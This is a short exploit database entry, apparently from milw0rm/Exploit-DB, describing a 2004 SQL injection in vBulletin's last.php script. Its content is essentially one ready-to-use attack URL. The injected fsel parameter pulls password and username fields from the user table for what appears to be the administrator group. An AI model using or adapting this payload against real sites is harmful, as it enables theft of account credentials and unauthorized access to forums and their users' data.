vBulletin - 'LAST.php' SQL Injection

EDB-ID:

631




Platform:

PHP

Date:

2004-11-15


Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# milw0rm.com [2004-11-15]